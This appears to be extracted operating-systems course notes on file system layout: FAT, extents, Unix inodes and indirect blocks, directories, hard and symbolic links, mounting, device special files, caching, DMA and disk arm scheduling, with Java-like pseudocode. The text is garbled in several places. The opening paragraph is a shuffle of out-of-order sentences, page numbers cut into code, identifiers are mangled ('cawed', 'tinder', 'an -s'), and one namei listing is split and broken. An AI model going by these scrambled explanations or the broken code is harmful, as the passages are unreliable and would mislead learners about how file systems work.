If a disk block is 2K bytes and a block number is four bytes.Both the space overhead (the percentage of the space taken up by pointers) and the time overhead (the percentage of the time seeking from one place to another) can be decreased by using larger blocks. consider a 2 GB disk with 2K blocks. The main problem with this approach is that the index array I can get quite large with modern disks. with 513 total indirect blocks. so a one-level tree (a single root node pointing directly to the leaves) can accommodate files up to 512 blocks. This representation has the added advantage of getting the “operating system” stuff (the links) out of the pages of “user data”. it means that the OS can prevent users (who are notorious for screwing things up) from getting their grubby hands on the system data. but take the link fields out of the blocks and gather them together all in one place. making it difficult to cache only information about open files. Accessing the 100th block of a file still requires walking through 99 links of a linked list. sometimes called clusters. Extents can be thought of as a compromise between linked and contiguous allocation. The basic idea is to represent each file as a tree of blocks. This approach is used in the “FAT” file system of DOS. (but not the file name). OS/2 and older versions of Windows. if we can get along with less. allocate an array I with one element for each block on the disk. What if the file is too big to fit all its block numbers 184 . The inode structure introduced by Unix groups together index information about each file individually. Since many files are quite small. or one megabyte in size. Rounded up to an even number of bytes. At some fixed place on disk. While that's not an excessive amount of memory given today's RAM prices. A two-level tree. that's 3 bytes--4 bytes if we round up to a word boundary--so the array I is three or four megabytes. the “address” (block number) of any block of the file can be found without any disk accesses. Large. 512 block numbers fit in a block. An index node (or inode for short) contains almost all the meta-data about a file listed above: ownership. The OS simply treats each group of (say) four continguous phyical disk sectors as one cluster. The Unix solution is to use a different kind of “block” for the root of the tree. only a few of them are open at any one time. and lots of algorithms work better with chunks that are a power of two bytes long. there are better uses for the memory. A 4K file would require three 2K blocks. and move the link field from block n to I[m] (see Figure 11. and it is only necessary to keep index information about open files in memory to get good performance. Unfortunately the whole-disk index described in the previous paragraph mixes index information about all files for the whole disk together. an inode contains the block numbers of the first few blocks of the file. The only problem with this idea is that it wastes space for small files. Also. but now the entire list is in memory. If the root node is cached in memory. are sometimes called extents. Any file with more than one block needs at least one indirect block to store its block numbers. so time to traverse it is negligible (recall that a single disk access takes as long as 10's or even 100's of thousands of instructions). with the data blocks as leaves. wasting up to one third of its space.17 on page 382). called a file access table (FAT) is now small enough that it can be read into main memory when the systems starts up. Each internal block (called an indirect block in Unix jargon) is an array of block numbers. The hardware designer fixes the block size (which is usually quite small) but the software can get around this problem by using “virtual” blocks. permissions. listing its children in order. particularly if they can be variable size. Inodes are small enough that several of them can be packed into one disk block. Disk Index: The idea here is to keep the linked-list representation. time stamps. For example. can handle files 512 times as large (up to one-half gigabyte). The whole array of links. The pages of user data are now full-size disk blocks. etc. There are million blocks. File Index: Although a typical disk may contain tens of thousands of files. In addition to the meta-data. clusters. this is serious problem. so a block number must be at least 20 bits.

Directories A directory is simply a table mapping character-string human-readable names to information about files..into the inode? The earliest version of Unix had a bit in the meta-data to indicate whether the file was “small” or “big.791. the inode contained the block numbers of indirect blocks rather than data blocks. Inumber 0 is not used.196. ownership. each directory also two special entries: an entry with name “.552 bytes (slightly more than 246 bytes. which points to the parent of the directory in the tree and an entry with name “. A directory entry contains only two fields: a character-string name (up to 14 characters) and a two-byte integer called an inumber. which is interpreted as an index into an array of inodes in a fixed. Thus the inumber in a directory entry may designate a “regular” file or another directory.403. The algorithm to convert from a path name to an inumber might be written in Java as 185 . doubly. locating an arbitrary block of any file requires reading at most three I/O operations. Unix carefully limits the set of operating system calls to ensure that the set of directories is always a tree. An inode is 128 bytes long.”.e. size (in blocks) and the block numbers of 16 blocks of the file. However.888 bytes (about 32 GB) can be represented without using triply indirect blocks.120.5 version of Unix.364 blocks or 34. but stores only the first block number of the file in the directory entry. for such huge files. For convenience. To represent files with more than 16 blocks. a pointer to an indirect block containing pointers to the next several blocks of the file. The inode contains pointers to (i. permissions. and triply indirect blocks. Unix has an even simpler directory format. More recent versions of Unix contain pointers to indirect blocks in addition to the pointers to the first few data blocks.613. The root of the tree is the file with inumber 1 (some versions of Unix use other conventions for designating the root directory).”. The entire file is represented as a linked list of blocks using the disk index scheme described above. allowing room for the 15 block pointers plus lots of metadata. the size of the file cannot be represented as a 32-bit integer.” For a big file. A real-life example is given by the Solaris 2. Block numbers are four bytes and the size of a block is a parameter stored in the file system itself. Each entry contains the name of one file. so 2048 pointers fit in one block. allowing arbitrary graphs of nodes. A large file is thus a lop-sided tree. A file of up to 12+2048+2048*2048 = 4. which is the root of a two-level tree whose leaves are the next blocks of the file. CP/M used multiple directory entries with the same name and different values in a field called the extent number. All but the earliest version of DOS provide hierarchical directories using a scheme similar to the one used in Unix. the maximum file size is (12+2048+2048*2048+2048*2048*2048)*8192 = 70. and an index to the blocks of the file) are stored in the inode rather than the directory entry. time stamps. CP/M had only one directory for the entire system. A directory is represented like any other file (there's a bit in the inode to indicate that the file is a directory). its owner. The entries in each directory point to its children in the tree.376. Of course. which points to the directory itself. DOS uses a similar directory entry format. An inode has direct pointers to the first 12 blocks of the file. block numbers of) the first few blocks of the file. Modern versions of Unix store the file length as a 64-bit integer. typically 8K (8192 bytes).. and with the triply indirect block. The early PC operating system CP/M shows how simple a directory can be. Since the inode for a file is kept in memory while the file is open. as well as pointers to singly. known location on disk. called a “long” integer in Java. a pointer to a doubly indirect block. 64 inodes fit in one disk block. and a pointer to a triply indirect block. or about 64 terabytes). not counting the operation to read or write the data block itself. so an entry is marked “unused” by setting its inumber field to 0. All the remaining information about the file (size.

"/d/e/f") works something like this: if (namei(1. You can learn the inumber of a file if you like.type == DIRECTORY) throw new Exception("cannot link to a directory"). 186 . current = nameToInumber (inode[current]. path[i]). The procedure namei walks the directory tree. there can be more than one directory entry designating the same file. Otherwise. i++) { if (inode[current]. } return current. String name) (not shown) reads through the directory file represented by the inode node. starting at a given inode and following a path described by a sequence of strings. String[] path) { for (int i = 0. i<path. Since all the information about a file except its name is stored in the inode. Unix provides a system call link (old-name. If the argument is an absolute path name (it starts with ‘/’). } The procedure nameToInumber(Inode node. parse("/a/b/c")). int dir = namei(1. parse("/d/e")): if (dir==0 || inode[dir]. if (inode[target]. if (current == 0) throw new Exception("no such file or directory"). current is the current working directory. Files are always specified in Unix system calls by a character-string path name. parse("/d/e/f")) != 0) throw new Exception("file already exists").int namei(int current.type != DIRECTORY) throw new Exception("not a directory"). if (target==0) throw new Exception("no such directory"). There is a procedure with this name in the Unix kernel. int target = namei(1. new-name) to create new names for existing files. This allows multiple aliases (called links) for a file. Each system call that has a path name as an argument uses namei to translate it to an inumber.length. The call link ("/a/b/c".type != DIRECTORY) throw new Exception("not a directory"). looks for an entry matching the given name and returns the inumber contained in that entry. namei is called with current == 1. but you can't use the inumber when talking to the Unix kernel.

and the inumber is included in that information. 187 .addDirectoryEntry(inode[dir]. Because links to directories are not allowed. Ownership is associated with the file not the directory entry (the owner's id is stored in the inode). Although this algorithm provides the ability to create aliases for files in a simple and secure manner. the only place the file system is not a tree is at the leaves (regular files) and that cannot introduce cycles. Directories do have unique names because the directories form a tree. If I create a file and you make a link to it. links cannot cross boundaries of physical disks. /a/b/c resolves to inumber 123. If the reference count of an inode drops to zero. it is possible to figure out the name of a directory. One of the components of the path name could be removed. We have seen that a file can have more than one name. and . and . that is not a reliable “handle” to the file (for example to link two files together by storing the name of one in the other). even though I'm being charged for its space.. so I may be unable to delete the file. The system calls are designed so that the set of directories will always be a single tree rooted at inode 1: mkdir creates a new empty (except for the . But there is no way of going in the other direction: to get a path name for a file given its inumber. Indeed. the system automatically deletes the files and returns all of its blocks to the free list. the entry (123. reference counting will fail to collect some garbage. entries) as a leaf of the tree. I will continue to be charged for it even if I try to remove it through my original name for it. There is no way to make an alias for a directory. The procedure parse (not shown here) is assumed to break up a path name into its components. mkdir. etc) update these reference counts appropriately. You can find out whether two path names designate the same file by comparing inumbers. thus invalidating the name even though the file still exists under a different name. only the system call unlink(name) which removes the directory entry corresponding to name. Worse still. It would consume resources (the inode and probably some data and indirect blocks) but there would be no way to read it. There is a system call to get the meta-data about a file. If. you could make it much bigger after I have no access to it. Even if you remember the path name used to get to the file. System calls that add or remove directory entries (creat. target. Unix protects against this “garbage collection” problem by using reference counts. What happens if it has no names (does not appear in any directory)? Since the only way to name a file in a system call is by a path name. • • • While it's not possible to find the name (or any name) of an arbitrary file. for example. There is no system call to delete a file. and link is not allowed to link to a directory. or even delete it. As we will see later. "f") is added to directory file designated by "/d/e". link. A file cannot be deleted without finding all the links to it and deleting them. entries). Unix avoids this problem by making sure cycles cannot happen. there's no one “true name” for a file. your link may be in a directory I don't have access to.. such a file would be useless. rmdir. rmdir is only allowed to delete a directory that is empty (except for the . "f"). “User” programs are not allowed to update directories directly. Since all aliases are equal. Each inode contains a count of the number of directory entries that point to it. We saw before that the reference counting algorithm for garbage collection has a fatal flaw: If there are cycles. it has several flaws: • It's hard to figure own how to charge users for disk space. The result is that both "/a/b/c" and "/d/e/f" resolve to the same file (the one with inumber 123). write to it. or to find a path name of an open file.

etc. else return getPath (parentInumber. it would be easy to write nameToInumber as a user-level procedure if you know the format of a directory. In such systems. is sometimes called a hard link)."). but searches for an entry containing a particular inumber and returns the name field of the entry. distinguished by a code in the inode from directories.. } The procedure nameToInumber is similar to the procedure with the same name described above. if (parentInumber == 1) return "/" + fname. A symbolic link is a new type of file. is code to find the name of the current working directory. Many versions of Unix allow a program to open a directory for reading and read its contents just like any other file. described in the previous section. FileInputSream parent = new FileInputStream (parentName). int parentInumber = nameToInumber(parent.". but takes an InputStream as an argument rather than an inode. ". } String cawed () { FileInputStream tinder = new FileInputStream (".” and “.and one of the properties of a tree is that there is a unique path from the root to any node."). more recent versions of Unix introduced the notion of a symbolic link (to avoid confusion. When the namei procedure that translates path names to inumbers encounters a symlink. getPath ("."). it treats the contents of the file as a pathname and 188 . Here. The procedure inumberToName is similar. for example. currentInumber). the original kind of link. thisInumber). ". parentName) + "/" + fname. class DirectoryEntry { int inumber. String name. regular files. int currentInumber) { String parentName = currentName + "/. Symbolic Links To get around the limitations with the original Unix notion of links.".” entries in each directory make this possible. } String getPath(String currentName.. String fname = inumberToName(parent. The “. int thisInumber = nameToInumber (tinder.

parent = current. if (current == 0) throw new Exception ("no such file or directory"). i++) { if (inode[current]. If the contents of the file is a relative path name (it does not start with a slash). if (current == 0) throw new Exception ("no such file or directory"). path[i]). it does just what you would expect in normal situations. } } return current. int namei (int current.charAt (0) == '/') current = namei (1. not the current working directory of the process doing the lookup. if (link.length. linkPath). else current = namei (parent. if (inode [current].type != DIRECTORY) throw new Exception ("not a directory"). i<path. Any time the procedure encounters a node of type SYMLINK.uses it to continue the translation. String[] path) { for (int i = 0. it recursively calls itself to translate the contents of the file. From the user's point of view. interpreted as a path name. it is interpreted relative to the directory containing the link itself. the picture looks like this: 189 . Then the command ln -s /a/b /d/e makes the path name /d/e a synonym for /a/b. Although the implementation looks complicated. String [] linkPath = parse(link). } The only change from the previous version of this procedure is the addition of the while loop. into an inumber. and also makes /d/e/c a synonym for /a/b/c. suppose there is an existing file named /a/b/c and an existing directory /d. For example.type == SYMLINK) { String link = getContents (inode[current]). current = nameToInumber (inode[current]. linkPath).

the picture looks like this Where the hexagon denotes a node of type symlink.In implementation terms.old/foo. Suppose I have an existing directory /usr/solomon/cs537/s90 with various sub-directories and I am setting up project 5 for this semester. the situation looks like this: 190 .c cat s90/proj5/foo.old cat proj5. Here's a more elaborate example that illustrates symlinks with relative path names..c cd /usr/solomon/cs537 cat f96/proj5.c Logically. I might do something like this: cd /usr/solomon/cs537 mkdir f96 cd f96 an -s .old/foo./s90/proj5 proj5.

The real version in Unix puts a limit on how many times it will iterate and returns an error code of “too many links” if the limit is exceeded. in some cases. Most people expect that the two commands cd foo 191 .And physically. this works fine: cd /usr/solomon mkdir bar ln -s /usr/solomon foo ls /usr/solomon/foo/foo/foo/foo/bar However. you can create a symlink to a non-existent file. For example. symlinks can cause infinite loops or infinite recursion in the namei procedure. The added flexibility of symlinks over hard links comes at the expense of less security. it looks like this: All three of the cat commands refer to the same file. Symlinks are neither required nor guaranteed to point to valid files. Symlinks can also have cycles. Symlinks to directories can also cause the “change directory” command cd to behave in strange ways. and in fact. You can remove a file out from under a symlink.

Here's how it works: The kernel maintains a table of existing mounts represented as (device1. which is an alias for /usr/solomon. respectively. Here's the expanded code: int namei (int curi. the current directory is /usr/solomon/foo/foo. the current device and inumber become device2 and 1. if (curi == 0) throw new Exception ("no such file or directory"). cd foo. Some shell programs treat cd specially and remember what alias you used to get to the current directory. i++) { if (disk[curdev].type == SYMLINK) { String (disk[curdev]. whenever the current (device. mount_point) Where device names a particular disk drive and mount_point is the path name of an existing node in the current directory tree (normally an empty directory). If you leave the device prefix off a path name. int curdev.. but the command cd . to cancel each other out.. if (disk[curdev]. is treated as if you had typed cd /usr/solomon/foo.cd . device2) triples.inode[curi]. the commands cd /usr/solomon cd foo cd . C is the name of the default hard disk).length. inumber) pair matches the first two fields in one of the entries. the system supplies a default current device similar to the current directory. Unix allows you to glue together the directory trees of multiple disks to create a single unified tree. String[] path) { for (int i = 0. as in C:\usr\solomon (by convention. There is a system call Mount (device.type != DIRECTORY) throw new Exception ("not a directory").inode[curi]. inumber.inode[curi]).inode[curi]. parent = curi. curi = nameToInumber (disk[curdev]. But in the last example. Mounting What if your computer has more than one disk? In many operating systems (including DOS and its descendants) a pathname starts with a device name. i<path. After cd /usr/solomon. Would leave you in the directory /usr. During namei. cd foo. The result is similar to a hard link: The mount point becomes an alias for the root directory of the indicated disk. path[i]). 192 link = getContents ..

} In this code.. An inode whose type is “special” (as opposed to “directory. rmdir. The operating system 193 . creat. curdev. The device argument to the mount system call names the remote computer as well as the disk drive and both pieces of information are put into the mount table. Information about remote open files.” they can be anywhere. The Network File System (NFS) from Sun Microsystems extends this idea to allow you to mount a disk from a remote computer. including a seek pointer and the identity of the remote machine. etc. is kept locally. returning -1 if no matching entry is found. if (current == 0) throw new Exception ("no such file or directory"). curi = 1.” entry in the root directory of a mounted disk behaves like a pointer to the parent directory of the mount point. linkPath).) are sent as messages to the remote computer. It is customary to put special files in the directory /dev. if (link. Each read or write operation is converted locally to one or more requests to read or write blocks of the remote file.. write. but since it is the inode that is marked “special. mkdir. There is a also a special case (not shown here) for “. Now there are three pieces of information to define the “current directory”: the inumber. the device. all operations (read. } int newdev = mountLookup (curdev. if (newdev != -1) { curdev = newdev. Instead of containing pointers to disk blocks.String [] linkPath = parse(link). If the current computer is remote. } } return current. we assume that mountLookup searches the mount table for matching entry. curi).” so that the “. linkPath). and the computer. How do you name a device? The answer is that devices appear in the directory tree as special files. else current = namei (parent.” “symlink. curdev. the inode of a special file contains information (in a machine-dependent format) about the device. delete.charAt(0) == '/') current = namei (1. NFS caches blocks of remote files locally to improve performance.” or “regular”) represents some sort of I/O device. Special Files I said that the Unix mount system call has the name of a disk device as an argument.

such as a mouse. or write the device just like a file. Some devices look more like real file than others. it is starting to show up more and more in other operating systems. The second to pointers to pointers to sectors (a double indirect node) and the third to pointers to pointers to sectors (triple indirect). etc. This results in increasing access times for blocks later in the file. the corresponding process is killed. The first points to inode structures that contain only pointers to sectors. it makes virtual memory look like a device.tries to make the device look as much like a file as possible. are write-only. You can read these files to get information about the states of processes. The seek operation on a device like /dev/tty updates the seek pointer. there are multiple terminal devices with names like /dev/tty0. If attributes are stored directly in the directory node. Other devices. the permissions for the raw disk devices are highly restrictive. If you delete one of these files. Node Direct Inode Indirect Inodes The last 3 sector pointers are special. In a sense. The special file /dev/tty represents the terminal. Large files will have longer access times to the end of the file. Some versions have a directory with one special file for each active process. Some versions of Unix make network connections look like files. On machines with more than one terminal. I-nodes specifically optimize for short files. even if more is requested. This choice bears directly on the implementation of linking. A disk device looks exactly like a file. but a read will return only the next physical block of data on the device. Some devices. This idea of making all sorts of things look like files can be very powerful. Directories Directories are generally simply files with a special interpretation. close. Although this idea was pioneered by Unix. /dev/tty1. (New EPA rules require that this data be recycled. but the seek pointer has no effect on reads or writes. Write operations on such devices have no effect. which is an image of the memory space of the current process. so that ordinary programs can open.) One particularly interesting device is /dev/mem. Another idea is to have a directory with one special file for each print job waiting to be printed. It is now used to generate federal regulations and other meaningless documents. Writes to /dev/tty display characters on the screen. Reads of /dev/tty are also different from reads of a file in that they may return fewer bytes than requested: Normally. There is special file called /dev/null that does nothing at all: reads return end-of-file and writes send their data to the garbage bin. this device is the exact opposite of memory-mapped files. this is an indirect block. (hard) linking is difficult because changes to the file must be mirrored in all 194 . Attempts to read from them give an end-of-file indication (a return value of zero). A read call will block the caller until at least one character can be returned. For obvious security reasons. Some directory structures contain the name of a file. the next read will get the remaining bytes. If the number of bytes requested is less than the length of the line. its attributes and a pointer3 either into its FAT list or to its i-node. Reads from /dev/tty return characters typed on the keyboard. Reads return whatever is on the disk and writes can scribble anywhere on the disk. read. are read-only. A tape drive looks sort of like a disk. a read will return characters only up through the next end-of-line. such as printers. Instead of making a file look like part of virtual memory.

but there are subsets of the space on different devices. but to the operating system marks the boundary between devices. During operation this distinction isn’t terribly interesting processes always read from the file cache first and only from the disk if the block is not cached. The slowest and most reliable choice is to write all data synchronously to disk. If the directory entry simply points to a structure (like an i-node) that holds the attributes internally. The consistency problem arises when the computer catastrophically fails. The Linux EXT2FS file system makes no special concessions to consistency. 3 It’s usually a sector number. but not to have a block appear once on the free list and once on a file’s allocation list. Caching Far and away the most effective strategy for improving file system performance is caching. Consider executables for commonly executed utilities. Its goal is a blazingly fast UNIX® file system. each of which marks a point on the consistency/ performance curve. only that structure needs to be updated. They write metadata synchronously to disk . The important issue with any caching system is the tradeoff between performance and consistency of the caching system. but not the most conservative approach.caching and file layout. the file system may be in an inconsistent state. When the OS restarts. Cached Blocks Caching is accomplished by setting aside a portion of memory and using it to store blocks as they are brought into memory. UNIX® clouds the issues by allowing one device to be grafted onto the name space established by another at a mount point. As a result. Making disks explicit makes the boundaries between physical devices clear. Multiple Disks There are two approaches to having multiple disks on a system (where disks are really devices that export a file system interface).TXT.that is any changes to the file system structures themselves are not cached. but thinking of it as a pointer is closer to its function. Every time a file is opened or created it requires accesses to all the directories from the root to the file itself. Either the disks can be explicit or implicit. Blocks are read or written into the memory if possible and written out to disk when convenient or when the block must be removed from the cache to make way for a new block. Other systems from IBM VM/CMS to Amiga DOS have done the same thing.directories. The issue is how writes are cached. File system structures include the free block list and file allocations. and it’s willing to risk the dangers of file system corruption if operation is interrupted at an inopportune moment. In this case that means the difference between the versions of file blocks that are in the cache and on the disk. 195 . This is the choice made by MS-DOS and Windows (for floppies anyway).Performance This lecture discusses the details of making the file system perform well. File System Implementation . and many files are referenced often. An example of explicit disk naming is MS-DOS’s A:\SYS\FILE. A mount point looks like a directory to the user. Accesses to the physical disk for these common cases can be avoided if the blocks that would have been read from the disk are cached in memory rather than being read from disk each time. the file system appears to be one seamless name space. The BSD FFS systems take a more conservative approach. This is primarily done with two mechanisms . for example a power outage when all the file cache blocks haven’t been written out to disk. There are several models of consistency that can be used. Thus its possible to lose modifications to allocated blocks in a file.

Alternatively. The problem is that after the first block is read and returned. A related issue is reducing rotational latency. Blocks appearing on both the free list and one file can (probably) be allocated to the file. which has 196 . In paging. Blocks no appearing at all should be considered free.The consistency issue underscores the difference between file cache management and virtual memory management algorithms. seeking from directory entry to data block. Files are usually read sequentially. Disk Layout Avoiding disk seeks is the most fruitful optimization to a file system after caching2. use only one cache for both virtual memory pages and cached file blocks. the more frequently the file system should be checked. The checking process is basically: • Compare the free list to the list of allocations for all the files. try to place related data physically close together on the disk. additional rotational delays can be incurred. Each block should appear exactly once. Modulo these differences. even if they take great pains to maintain that integrity. When seeks are expensive. Consider the inode case. File System Checking Most systems have a mechanism for checking the file system integrity. In the file system some blocks contain data that is essential to the continued correct operation of the filesystem1 and must be treated specially. the OS issues a request for the next block. This allows the number of pages or file blocks to grow as needed. and does its best to place data sectors near the i-node that owns the file to reduce seek times. • The less consistency the operating system enforces. If files exist that have no directory entries deleted them and reclaim their allocations. and it’s worthwhile to periodically check the file systems to reduce the impact of any damage. The Berkeley fast file system disperses in-nodes throughout the disk. but if file blocks are laid out contiguously on the disk. In the original Berkeley UNIX file system. One source of seeks is seeking from i-nodes allocated on one end of the disk to data blocks on the other. Blocks allocated to two or more files are a complicated case that probably requires human intervention. In general a variant of LRU is usually used. the concept covers many operating systems. i-nodes were allocated at the beginning of the disk and data blocks everywhere else. paging algorithms are a good fit for managing the file cache. like FreeBSD and Solaris. In fact. some systems. Occasional bad blocks or software bugs may corrupt data. • • • Old File system Fast File system Inodes Although that example is UNIX-specific. with the modifications appropriate for the level of consistency required being made. This can be caused by a system like UNIX that allow open files to remain on the disk while a process has them open. all pages are transient and therefore equally important. Check all directories for pointers to the files.

but once the program has been established. That’s true of disks. CDs. converting from the OS’s logical view to the messy realities of the hardware. . because not only are the blocks essential for the correct FS operation. This allows multiple devices to share a single bus slot. Generally a priority ordering is used. A memory file system can avoid these issues. Depending on the services offered by the hardware. Typically DMA devices will issue interrupts on I/O completion. Some devices can have their handlers interrupted by higher priority devices. Device controllers are also a frequent location for additional intelligence in the network. The CPU is still responsible for scheduling the memory accesses made by DMA devices. It’s even a little worse than this. sometimes the information in the blocks are interrelated. • • • Memory Frequently. Such device registers are either accessible through special I/O instructions or by memory mapping the device registers into the processor’s address space. 2. tapes. The disk now must wait one rotation time until the beginning of the sector appears again. commonly abbreviated DMA). 1. Assuming that seeks are expensive in the file system. Bus slots may be a scarce resource. as if the data were being moved to memory. the CPU has no further involvement until the transfer is complete. the system must poll device state when a high-priority interrupt returns in case a low-priority interrupt has been lost. devices are not directly connected to the bus. Direct Memory Access (DMA) In simple systems. The easiest example is that a block being removed from the free list and added to a file depends on at least two blocks being consistently updated. the CPU must move each data byte to or from the bus using a LOAD or STORE instruction. By interleaving file blocks.partially rotated past the disk head. 197 The I/O Subsystem The I/O subsystem is concerned with the work of providing the virtual interface to the hardware. this may result in interrupts being delayed or even lost. which pass parameters from CPU to device (or controller). Devices or controllers are frequently controlled by accessing device registers. In order to allow systems to support high I/O utilization while the CPU is getting useful work done on the users’ half. but not of memory. This direct access of memory by devices (or controllers is called Direct Memory Access. This is the code that has to deal with the idisyncracies of devices. but are managed by controllers.1 The Operating System is also responsible for coordinating the interrupts generated by the devices (and controllers). devices are allowed to directly access memory. If a system blocks rather than delaying interrupts. This quickly uses up much of the CPU’s computational power. the time to return the block and get the next request can be spend spinning over an unneeded block.

Again the naming system should be as flexible as possible. writing an interface to such smart peripherals is often a delicate balancing act between making features available and making the device unrecognizable. All network adapters should accept packets. Moreover. In some sense DMA is simply an intermediate step to general purpose programmability on devices and device controllers. Furthermore. Dealing with that programmibility requires synchronization and care. at other levels they should be seen. The I/O system code is what turns the asynchronous interrupts into system events that can be handled by the CPU. although hiding errors can be good at some level. DMA devices often confuse or are confused by virtual memory. and the CPU must deal with that. Events on disk drives occur without any regard for the state of the CPU. not a user process. Guarantee that memory intended for use by a DMA device is not manipulated by the paging system while the I/O is being performed. In practice this is mitigated by the need to expose some features of the hardware. I/O Software The I/O software of the OS has several goals: • Device Independence: All peripherals performing the same function should have the same interface. Error Handling: Devices can often deal with errors without user input . encryption and compression and general purpose processors. Several such smart controllers exist. It’s the I/O system’s job to make sure that sharing is fair (for some fairness metric) and efficient. Fatal errors need to be communicated to the user in an understandable manner as well. Uniform Naming: The OS needs to have a way to describe the various devices in the system so that it can administer them. to digital signal processing. For example devices should all be accessible by capability. The protection of devices should be managed consistently.Because this memory is not being manipulated by the CPU. User processes themselves are generally restricted from accessing devices directly. and therefore addresses may not pass through an MMU. Such pages are usually frozen (or pinned) to avoid changes. All disks should present logical blocks. or all by the file system. Users must be able to tell that their disks are slowly failing. checksum calculations. although such accesses may be allowed to improve performance at the cost of security and stability. • • • • Software Levels Interrupt Handlers The Interrupt Service Routines (ISRs) are short routines designed to turn the asynchronous events from devices (and controllers) into synchronous ones that the operating system can deal with 198 . Synchrony and Asynchrony: The I/O system needs to deal with the fact that external devices are not synchronized with the internal clock of the CPU. in order for code to be portable.retrying a disk read or something similar. It is important to that’s the address space of the processor itself. Device Sharing: Most devices are shared at some granularity by processes on a general purpose computer. Systems also have to deal with devices joining or leaving the name space (PCMCIA cards). with features ranging from bit swapping.

e. The most common use of disks is for file systems. Each device is a different with different purposes. In addition to providing a uniform interface. Disk Drives: Disk drivers control one or more physical magnetic disks. multiplexing and demultiplexing data transfers. Conceptually. Print and open are easier to use than write and open.g. different implementations. for instance. because the file system overhead may depend strongly on the size of the OS’s logical blocks. logical ® physical mapping is just a matter of placing an ordering on the physical disk sectors that matches the logical disk sectors. Device Drivers: Device drivers are primarily responsible for issuing the low-level commands to the hardware that gets the hardware to do what the OS wants. ISRs generally encode the information about the interrupt into some queue that the OS checks regularly . It enforces protection. and measuring and reporting device performance. but it is the device driver that converts such logical addresses to real physical addresses and encodes them in a form that the hardware can understand. the uniform interface is sometimes pierced at this level to expose specific hardware features -. We will consider a representative sample of several kinds of device drivers and the specifics of how they work. This part of the OS provides consistent device naming and interfaces to the users. Also. some set of interrupts is usually blocked. much of them is hardware dependent. Device Independent OS Code: This is the part of the OS we’ve really been talking the most about. multiplexing requests and demultiplexing responses. and for error handling. Device drivers may also be responsible for programming smart controllers. databases and assorted other uses. but they are also used for swap space. on a context switch. which is pretty simple.in time. and does logical level caching and buffering. The OS may be coded in terms of logical block numbers for a file. Specifically such systems handle data formatting and buffering. User Code: Even the OS code is relatively rough and ready. Beyond that there are user level programs that specifically provide I/O services (daemons). Block Naming: In the simplest case. Good examples are the standard I/O library that provides a simplified interface to the file system. While an ISR is executing. Such programs spool data. or directly provide the services users require. letting them know what general errors occurred when the device driver couldn’t recover. Device Driver Specifics: We now consider some of the details of device drivers. The two may differ because multiple disks managed by the same OS may have different physical block sizes. The device drives is responsible for logical ® physical translations. The device independent code also provides a consistent error mode to users. and different worldviews.CD audio capabilities. raw backups. sometimes a logical block size much in excess of the disks sectors is chosen to 199 . Differences between logical and physical block sizes can confuse this. As a result. User libraries provide simpler interfaces to I/O systems. which is a dangerous state of affairs that should be avoided as much as possible. perhaps the most important facet of device drivers is the conversion from logical to physical addressing.

9 1. Without optimizing at all. 34. 34. Multiplexing and Arm Scheduling The first issue in multiplexing multiple requests is doing so efficiently. if the controller cannot multiplex. In practice the elevator algorithm strikes a good balance between efficiency and fairness. This can make life much trickier. in which case the device driver needs to do a little bookkeeping. 36. seek times can vary widely based on the applications making requests. 16. as well as some new ones. We will illustrate the scheduling algorithms by using them to order requests for the following tracks (in the oder they were queued): 11. 1. it has to adopt some strategy for which errors to try to correct and which to report. Some familiar algorithms appear. From the OS point of view. 1. Lone accesses to distant tracks suffer very long access times. An intelligent controller may be able to handle several outstanding requests from the software. Most of the latency in serving a disk request is in seeks time. 34. these remapping are often done in the hardware. Efficiently in this case means with returning data to the users as quickly as possible. • • • There are other issues in multiplexing. 12. Error Handling The disk device is the first element of the OS to see an error. The size of the FAT is directly dependent on the number of sectors (and is bounded by the size of the entry in a FAT cell). Scheduling the requests to minimize seek time is often handled by the device driver. because the problem is essentially scheduling accesses by the disk arm. 9. Of course. but almost never used. There are a variety of things that can go 200 . 9. Error handling may also interfere with a straightforward logical ® physical mapping. 12. The [problem with this algorithm is that it encourages access patterns that keep the disk head in one place.keep the size of the OS tables small. Shortest Seek First (SSF): This is analogous to shortest job first. 12 • FIFO: The requests are served in the order they appear: 11. Some smart disk systems leave a few blocks unassigned on the disk when it is formatted for use when other blocks go bad. 16. 16. On our canonical input. the simple arm scheduling above applies. 1. i. the access pattern is 11. 16. but can generally leave it to the controller. the data is moved from the bad block to one of the setaside blocks and the logical ® physical mapping changed so that the logical block maps to the setaside block rather than the bad block. To address a large disk partition may require using large block sizes. the request that requires moving the arm the least distance is served next: 11. A compromise between optimization and fairness is needed. but as disk controllers (and drives) get smarter. 9. moving the disk arm over the proper track. with the head moving toward higher sectors. 36. never get served at all. 34. One example of this is large disks using a FAT file system. 12. The Elevator Algorithm The elevator algorithm tries to keep the disk arm moving one direction. in the worst case. Originally. 36.. this transparently repairs bad blocks.e. This is easy to implement. such block-shuffling shenanigans were all done in the software. mostly related to how intelligent the controller is. Scheduling user disk requests is called arm scheduling. When a bad block is detected. 36. or. Accordingly.

Faster.transparently repaired bad blocks may show up as a performance penalty. You can find similar problems with the other helpful features above . There are two problems: the software and hardware may be unaware of each other. Caching. eliminating the rotational and seek delays. The disk firmware renumbers the sectors rather than the OS doing layout. the software has less to do and life is great. Smarter. however. When a sector shows a sharp increase in checksum errors. Functionality that was traditionally in the drivers is now being moved to controllers and disk firmware. exists primarily if the features of the hardware cannot be disabled. Sectors read from those tracks are read not from disk. Smart disk controllers. and Tannenbaum discusses quite a few. For an example of the hardware and software being at cross purposes. As a result. 201 . spending CPU time to schedule the disk arm in the device driver only to have the controller do the same caching algorithm in hardware is a waste of CPU time. • • • In some sense. The result is a block layout that is almost certainly suboptimal. Bigger. The other problem. Some of them are not reproducible. some disk firmware locates and remaps bad blocks on disk directly. allow several outstanding simultaneous requests for data form the same disk. Many disks today encode this layout as the interleaving of sectors on the disk. As mentioned above. In some cases. Bad blocks. this is all positive news. A human being or a higher level of the operating system may want to check into the matter further. lack of flexibility. Most disks and disk controllers cache one or more tgracks of data in memory on the hardware. caching sectors both in memory and on disk is wasteful and degrades the value of one of the caches. for example high-end SCSI controllers. The file system spends some additional time when blocks are allocated to ensure that they’re placed to minimize latency. device drivers are less concerned with directly manipulating the devices as they are with programming the controllers to do so. The Berkeley fast file system did clever layout of file blocks within a track to reduce the rotational latency when the file was read sequentially. Ideally. or disable the OS routines that do work done by the controller. the appropriate response to the error is to reset some confused part of the hardware and retry the operation. Some. and will never bother the system again. and then the hardware moves them again because of its interleaving. Good device drivers try to strike a balance between reporting too many and reporting too few errors. Arm Scheduling.wrong in the disk. In practice this may be less straightforward. More Disk drivers and controllers are getting smarter by the revision. Some important functionalities that have begun to appear in disk hardware: • Interleaving. The controller firmware schedules 